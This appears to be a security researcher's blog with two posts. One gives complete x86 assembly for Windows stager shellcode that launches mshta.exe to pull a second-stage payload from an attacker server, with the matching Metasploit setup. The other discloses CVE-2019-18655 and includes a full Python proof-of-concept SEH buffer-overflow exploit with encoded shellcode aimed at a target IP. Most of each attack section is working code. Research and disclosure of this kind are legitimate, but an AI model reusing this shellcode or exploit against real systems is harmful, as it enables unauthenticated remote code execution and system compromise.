Thursday, January 14, 2021

Shellcode: Windows/x86 - Stager Generic MSHTA (143 bytes)

In this post, I would like to explore the development of a multi-stage shellcode that utilizes the JMP/CALL/POP technique alongside static kernel32.dll function addresses to bypass small stack space restrictions.

Targeting Windows x86 systems, this shellcode leverages the mshta.exe binary to execute a second-stage payload delivered via Metasploit’s hta_server exploit module.

To avoid bad characters, the shellcode alternates the message db string between uppercase and lowercase letters.  

In order to bypass the previously outlined constraints, the following shellcode was written based on these design specifications:

  • Function address of CreateProcessA in kernel32.dll: 0x75732082
  • Function address of ExitProcess in kernel32.dll: 0x7578214f
  • Size in bytes of message db parameter, 65 bytes -> 0x41 hex
  • Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit.

Shellcode Assembly Code:

global _start
section .text


_start:
	jmp application


firststep:
	pop edi
	xor eax, eax
	mov [edi+65], al		; size in bytes of message db parameter


StartUpInfoANDProcessInformation:
	push eax			; hStderror null in this case
	push eax			; hStdOutput, null
	push eax			; hStdInput, null
	xor ebx, ebx
	xor ecx, ecx
	add cl, 0x12			; 18 times loop to fill both structures.


looper:
	push ebx
	loop looper
	;mov word [esp+0x3c], 0x0101	; dwflag arg in startupinfo
	mov bx, 0x1111
	sub bx, 0x1010		
	mov word [esp+0x3c], bx
	mov byte [esp+0x10], 0x44	; cb=0x44
	lea eax, [esp+0x10]		; eax points to StartUpInfo
					; eax has a pointer to StartUPinfo
					; esp has a pointer to Process_Info containing null values


createprocessA:
	push esp			; pointer to Process-Info
	push eax			; pointer to StartUpInfo
	xor ebx, ebx
	push ebx			; null
	push ebx			; null
	push ebx			; null
	inc ebx
	push ebx			; bInheritHandles=true
	dec ebx
	push ebx			; null
	push ebx			; null
	push edi			; pointer to message db string
	push ebx			; null


	mov edx, 0x75732082		; CreateProcessA addr in kernel32.dll
	call edx


ExitProcess:
	push eax			; createprocessA return in eax
	mov edx, 0x7578214f		; ExitProcess addr in kernel32.dll
	call edx


application:
	call firststep
	message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"

Upon execution on the victim machine, this shellcode downloads and executes the configured exploit payload from the attacker’s server using the “hta_server” exploit module in Metasploit. Below is provided an example of the “hta_server” exploit configuration:

# msf6 >
# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
# msf6 exploit(windows/misc/hta_server) > run	(second stage delivery server execution)

It is important to highlight that, this shellcode is compatible with the following Metasploit's payloads:

  • generic/custom
  • generic/debug_trap
  • generic/shell_bind_tcp
  • generic/shell_reverse_tcp
  • generic/tight_loop
  • windows/dllinject/bind_hidden_ipknock_tcp
  • windows/dllinject/bind_hidden_tcp
  • windows/dllinject/bind_ipv6_tcp
  • windows/dllinject/bind_ipv6_tcp_uuid
  • windows/dllinject/bind_named_pipe
  • windows/dllinject/bind_nonx_tcp
  • windows/dllinject/bind_tcp
  • windows/dllinject/bind_tcp_rc4
  • windows/dllinject/bind_tcp_uuid
  • windows/dllinject/reverse_hop_http
  • windows/dllinject/reverse_http
  • windows/dllinject/reverse_http_proxy_pstore
  • windows/dllinject/reverse_ipv6_tcp
  • windows/dllinject/reverse_nonx_tcp
  • windows/dllinject/reverse_ord_tcp
  • windows/dllinject/reverse_tcp
  • windows/dllinject/reverse_tcp_allports
  • windows/dllinject/reverse_tcp_dns
  • windows/dllinject/reverse_tcp_rc4
  • windows/dllinject/reverse_tcp_rc4_dns
  • windows/dllinject/reverse_tcp_uuid
  • windows/dllinject/reverse_winhttp
  • windows/dns_txt_query_exec
  • windows/download_exec
  • windows/exec
  • windows/loadlibrary
  • windows/messagebox
  • windows/meterpreter/bind_hidden_ipknock_tcp
  • windows/meterpreter/bind_hidden_tcp
  • windows/meterpreter/bind_ipv6_tcp
  • windows/meterpreter/bind_ipv6_tcp_uuid
  • windows/meterpreter/bind_named_pipe
  • windows/meterpreter/bind_nonx_tcp
  • windows/meterpreter/bind_tcp
  • windows/meterpreter/bind_tcp_rc4
  • windows/meterpreter/bind_tcp_uuid
  • windows/meterpreter/reverse_hop_http
  • windows/meterpreter/reverse_http
  • windows/meterpreter/reverse_http_proxy_pstore
  • windows/meterpreter/reverse_https
  • windows/meterpreter/reverse_https_proxy
  • windows/meterpreter/reverse_ipv6_tcp
  • windows/meterpreter/reverse_named_pipe
  • windows/meterpreter/reverse_nonx_tcp
  • windows/meterpreter/reverse_ord_tcp
  • windows/meterpreter/reverse_tcp
  • windows/meterpreter/reverse_tcp_allports
  • windows/meterpreter/reverse_tcp_dns
  • windows/meterpreter/reverse_tcp_rc4
  • windows/meterpreter/reverse_tcp_rc4_dns
  • windows/meterpreter/reverse_tcp_uuid
  • windows/meterpreter/reverse_winhttp
  • windows/meterpreter/reverse_winhttps
  • windows/metsvc_bind_tcp
  • windows/metsvc_reverse_tcp
  • windows/patchupdllinject/bind_hidden_ipknock_tcp
  • windows/patchupdllinject/bind_hidden_tcp
  • windows/patchupdllinject/bind_ipv6_tcp
  • windows/patchupdllinject/bind_ipv6_tcp_uuid
  • windows/patchupdllinject/bind_named_pipe
  • windows/patchupdllinject/bind_nonx_tcp
  • windows/patchupdllinject/bind_tcp
  • windows/patchupdllinject/bind_tcp_rc4
  • windows/patchupdllinject/bind_tcp_uuid
  • windows/patchupdllinject/reverse_ipv6_tcp
  • windows/patchupdllinject/reverse_nonx_tcp
  • windows/patchupdllinject/reverse_ord_tcp
  • windows/patchupdllinject/reverse_tcp
  • windows/patchupdllinject/reverse_tcp_allports
  • windows/patchupdllinject/reverse_tcp_dns
  • windows/patchupdllinject/reverse_tcp_rc4
  • windows/patchupdllinject/reverse_tcp_rc4_dns
  • windows/patchupdllinject/reverse_tcp_uuid
  • windows/patchupmeterpreter/bind_hidden_ipknock_tcp
  • windows/patchupmeterpreter/bind_hidden_tcp
  • windows/patchupmeterpreter/bind_ipv6_tcp
  • windows/patchupmeterpreter/bind_ipv6_tcp_uuid
  • windows/patchupmeterpreter/bind_named_pipe
  • windows/patchupmeterpreter/bind_nonx_tcp
  • windows/patchupmeterpreter/bind_tcp
  • windows/patchupmeterpreter/bind_tcp_rc4
  • windows/patchupmeterpreter/bind_tcp_uuid
  • windows/patchupmeterpreter/reverse_ipv6_tcp
  • windows/patchupmeterpreter/reverse_nonx_tcp
  • windows/patchupmeterpreter/reverse_ord_tcp
  • windows/patchupmeterpreter/reverse_tcp
  • windows/patchupmeterpreter/reverse_tcp_allports

Supplementary Information: 

Shellcode Architecture: Windows x86
Shellcode Length: 143 Bytes

Tested on: 

  • Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
  • Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
  • Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)


Posted by at

Friday, November 08, 2019

CVE-2019-18655: FILE SHARING WIZARD VERSION 1.5 - GET SEH BASED BUFFER OVERFLOW

After spending several hours analyzing multiple binaries for vulnerabilities, a Structured Exception Handler (SEH)-based buffer overflow vulnerability was identified in the File Sharing Wizard binary, version 1.5.0. An unauthenticated attacker is able to achieve remote code execution (RCE) by sending a specially crafted HTTP GET request containing a malicious payload in the request's URL.

This vulnerability stems from improper input validation and bounds checking in the application’s request handling routines. When the input exceeds the expected buffer size, the overflow overwrites the SEH chain, enabling arbitrary code execution.

The vulnerability resembles previously disclosed issues such as:

  • CVE-2019-17415

  • CVE-2019-16724

  • CVE-2010-2331

In successful exploitation scenarios, attackers may gain shell access to the target system and execute arbitrary OS-level commands—without authentication.

Exploitation Steps

An attacker can exploit the vulnerability through the following steps:

  1. Identify a target running File Sharing Wizard v1.5.0 and accessible via HTTP.

  2. Craft a malicious URL containing a buffer overflow payload that corrupts the SEH handler.

  3. Send the HTTP GET request to the target using tools like Python scripts or exploit frameworks.

  4. Trigger the buffer overflow, leading to SEH chain hijacking and redirection of execution to attacker-controlled shellcode.

  5. Gain remote access via a command shell or reverse shell, with the same privileges as the running application.


Following is provided a Proof of Concept (PoC) exploit:

################### PoC ################### 
#!/usr/bin/python 
import socket 
import os 
import sys 

# Bad chars: \x00\x20 # 
# SEH value: 0x9090eb08 (JMP short) # 
# NSEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)  

seh='\x6d\x57\x37\x7c' 
nseh='\x90\x90\xeb\x08' 

buf = b"" 
buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31" 
buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb" 
buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c" 
buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19" 
buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11" 
buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e" 
buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a" 
buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77" 
buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78" 
buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4" 
buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f" 
buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18" 
buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b" 
buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf" 
buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b" 
buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b" 
buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde" 

poc= 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949-len(buf)) 
payload='GET //.:/' + poc + ' HTTP/1.0\r\n\r\n' 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect(("172.16.216.135", 80)) 
s.send(payload) 
s.close 

Recommended Mitigations:

  • Immediately restrict or disable access to File Sharing Wizard instances exposed to untrusted networks.

  • Apply vendor patches or consider replacing the software if no fix is available.

  • Implement network-based intrusion prevention systems (IPS) to detect and block exploit patterns.

  • Monitor logs and network traffic for anomalous GET requests targeting the service.

Conclusion

This vulnerability in File Sharing Wizard v1.5.0 represents a severe security risk  due to its unauthenticated nature and potential for full system compromise.

Reporting Information:

CVE Identifier: CVE-2019-18655
CVSS Score: 9.8
Affected Versions: File Sharing Wizard v1.5.0
Product URL: https://file-sharing-wizard.soft112.com/
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-18655
Reported By: Armando Huesca Prida
Tested on: 
  • Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002 
  • Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601 

Posted by at